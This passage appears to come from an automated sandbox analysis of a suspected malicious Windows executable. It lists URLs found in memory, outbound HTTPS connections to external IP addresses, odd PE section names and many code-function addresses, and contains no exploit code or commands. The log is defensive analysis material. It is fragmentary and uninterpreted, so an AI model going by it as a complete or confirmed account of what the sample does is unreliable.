                Source: 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2268524976.00000000013A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2241720473.0000000005D03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2241720473.0000000005D03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2241720473.0000000005D03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2241720473.0000000005D03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2241720473.0000000005D03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2241720473.0000000005D03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2170094155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2269059253.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2298596766.00000000013DD000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2268524976.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000002.2350812959.00000000013E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2148207115.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2170149537.00000000013A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49719 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49731 version: TLS 1.2

                System Summary

                barindex
                PE file contains section with special chars
                Source: 3LUyRfIoKs.exeStatic PE information: section name:
                Source: 3LUyRfIoKs.exeStatic PE information: section name: .idata
                Source: 3LUyRfIoKs.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_3_01406B540_3_01406B54
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_3_01406B540_3_01406B54
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_3_01406C070_3_01406C07
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_3_01406C070_3_01406C07
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_3_01406B540_3_01406B54
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_3_01406B540_3_01406B54
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_3_01406C070_3_01406C07
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_3_01406C070_3_01406C07
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AAB1000_2_00AAB100
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AD92800_2_00AD9280
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AB12270_2_00AB1227
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00ACD34A0_2_00ACD34A
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AE04600_2_00AE0460
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AC74400_2_00AC7440
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00ADC5A00_2_00ADC5A0
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AAE6870_2_00AAE687
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AA86000_2_00AA8600
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AB57C00_2_00AB57C0
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AE0D200_2_00AE0D20
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AC1D000_2_00AC1D00
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AD8EA00_2_00AD8EA0
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AACE450_2_00AACE45
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B6C0BC0_2_00B6C0BC
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00BAC0A90_2_00BAC0A9
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B7B0960_2_00B7B096
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B420970_2_00B42097
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00ACC09E0_2_00ACC09E
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AB60E90_2_00AB60E9
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00ACC0E60_2_00ACC0E6
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B4C0FF0_2_00B4C0FF
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B5C0EF0_2_00B5C0EF
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B3A0E80_2_00B3A0E8
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B3E0EC0_2_00B3E0EC
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B8C0D80_2_00B8C0D8
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00ACA0CA0_2_00ACA0CA
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B190D60_2_00B190D6
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B020DB0_2_00B020DB
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B2E0DE0_2_00B2E0DE
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B740C70_2_00B740C7
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B8E0CE0_2_00B8E0CE
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B7C0CC0_2_00B7C0CC
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AAD0210_2_00AAD021
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B8902D0_2_00B8902D
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B1E0260_2_00B1E026
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B050100_2_00B05010
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00ABD0030_2_00ABD003
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B0301E0_2_00B0301E
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B490560_2_00B49056
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B780520_2_00B78052
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00BA70520_2_00BA7052
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B770580_2_00B77058
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B9D0410_2_00B9D041
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AC91AE0_2_00AC91AE
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B601B40_2_00B601B4
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00BA21BC0_2_00BA21BC
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B201A30_2_00B201A3
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B471AC0_2_00B471AC
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B161AF0_2_00B161AF
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B8819A0_2_00B8819A
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00ADF18B0_2_00ADF18B
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00D791FE0_2_00D791FE
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00ACE1800_2_00ACE180
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B4F1870_2_00B4F187
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B621810_2_00B62181
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B3918D0_2_00B3918D
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B311F90_2_00B311F9
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B371F80_2_00B371F8
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B2D1E30_2_00B2D1E3
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B851EC0_2_00B851EC
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B8A1EC0_2_00B8A1EC
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B5E1E20_2_00B5E1E2
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AC81CC0_2_00AC81CC
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B9B1D90_2_00B9B1D9
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B7D1DC0_2_00B7D1DC
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B181DC0_2_00B181DC
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B571DA0_2_00B571DA
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B911CB0_2_00B911CB
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B691C20_2_00B691C2
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B291330_2_00B29133
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B8613B0_2_00B8613B
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B5213F0_2_00B5213F
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B6713C0_2_00B6713C
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B7013D0_2_00B7013D
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B281390_2_00B28139
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B231290_2_00B23129
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B8F1180_2_00B8F118
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B0F1710_2_00B0F171
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AB81690_2_00AB8169
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B9017C0_2_00B9017C
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B9C17F0_2_00B9C17F
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B8117F0_2_00B8117F
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AA61600_2_00AA6160
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B7517D0_2_00B7517D
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B561520_2_00B56152
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00ACC09E0_2_00ACC09E
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B7E14F0_2_00B7E14F
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00C6113A0_2_00C6113A
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B1314E0_2_00B1314E
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B2F2A20_2_00B2F2A2
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B6D2A50_2_00B6D2A5
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00BA02A90_2_00BA02A9
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B452A10_2_00B452A1
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00BA529E0_2_00BA529E
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B5D2870_2_00B5D287
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B7A2840_2_00B7A284
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B2528D0_2_00B2528D
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B672F30_2_00B672F3
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B222E70_2_00B222E7
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B1F2EB0_2_00B1F2EB
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B232EC0_2_00B232EC
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B4D2EA0_2_00B4D2EA
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B682E90_2_00B682E9
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B662D10_2_00B662D1
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B122C00_2_00B122C0
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B062C90_2_00B062C9
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AC42D00_2_00AC42D0
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B582C90_2_00B582C9
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B2C23B0_2_00B2C23B
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00ABE2200_2_00ABE220
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B1C2250_2_00B1C225
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B822120_2_00B82212
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00C552750_2_00C55275
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B9620C0_2_00B9620C
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B8B27B0_2_00B8B27B
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B9A27A0_2_00B9A27A
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B242620_2_00B24262
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B4B2670_2_00B4B267
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AA42700_2_00AA4270
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B802640_2_00B80264
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B412560_2_00B41256
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B6125F0_2_00B6125F
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B922480_2_00B92248
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B9E2480_2_00B9E248
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B792440_2_00B79244
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B6324A0_2_00B6324A
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B873A00_2_00B873A0
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B713950_2_00B71395
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B893900_2_00B89390
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B843820_2_00B84382
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B363F50_2_00B363F5
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00BA33FC0_2_00BA33FC
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B723E60_2_00B723E6
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B193E50_2_00B193E5
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B4A3EB0_2_00B4A3EB
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B6E3D20_2_00B6E3D2
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AAF3C00_2_00AAF3C0
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AC83D80_2_00AC83D8
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B3D3C60_2_00B3D3C6
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AA73D00_2_00AA73D0
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B9D3C70_2_00B9D3C7
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B383210_2_00B38321
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B743110_2_00B74311
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B173040_2_00B17304
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B8D30E0_2_00B8D30E
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AA93100_2_00AA9310
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B653780_2_00B65378
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B983610_2_00B98361
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00ACF3770_2_00ACF377
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B0D36B0_2_00B0D36B
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B483680_2_00B48368
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B503530_2_00B50353
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B3F35B0_2_00B3F35B
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00C5A32E0_2_00C5A32E
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AC13400_2_00AC1340
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B4E3580_2_00B4E358
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B3935D0_2_00B3935D
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B213410_2_00B21341
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B2B4B40_2_00B2B4B4
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B2A4BC0_2_00B2A4BC
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B304BD0_2_00B304BD
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B084940_2_00B08494
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B784920_2_00B78492
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B3E4990_2_00B3E499
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B594860_2_00B59486
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B6448F0_2_00B6448F
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B994FE0_2_00B994FE
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AC24E00_2_00AC24E0
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B414F80_2_00B414F8
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B5F4F90_2_00B5F4F9
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B704E20_2_00B704E2
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B164E70_2_00B164E7
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AAD4F30_2_00AAD4F3
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B974DE0_2_00B974DE
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AC04C60_2_00AC04C6
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B9C4240_2_00B9C424
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00BA74080_2_00BA7408
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B734080_2_00B73408
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B1D4770_2_00B1D477
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B6F4640_2_00B6F464
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AB747D0_2_00AB747D
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B7C4690_2_00B7C469
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B474520_2_00B47452
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B2645E0_2_00B2645E
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00ADA4400_2_00ADA440
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B954480_2_00B95448
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B054490_2_00B05449
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B5544E0_2_00B5544E
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B105A30_2_00B105A3
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B185A20_2_00B185A2
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B1A5A50_2_00B1A5A5
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B0F5A60_2_00B0F5A6
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B685AF0_2_00B685AF
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B375AD0_2_00B375AD
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B755920_2_00B75592
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B815920_2_00B81592
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00BA35910_2_00BA3591
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B095820_2_00B09582
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00BA15F40_2_00BA15F4
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AA65F00_2_00AA65F0
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B295D30_2_00B295D3
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B825DA0_2_00B825DA
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B965D60_2_00B965D6
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00ADA5D40_2_00ADA5D4
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B475CD0_2_00B475CD
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B805C40_2_00B805C4
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B4F5C90_2_00B4F5C9
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B5D5CA0_2_00B5D5CA
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00ACC53C0_2_00ACC53C
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B245080_2_00B24508
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B7D50C0_2_00B7D50C
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B865710_2_00B86571
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AC45600_2_00AC4560
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B525790_2_00B52579
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B0D5600_2_00B0D560
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B695560_2_00B69556
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B9F5590_2_00B9F559
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00C6752E0_2_00C6752E
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B945520_2_00B94552
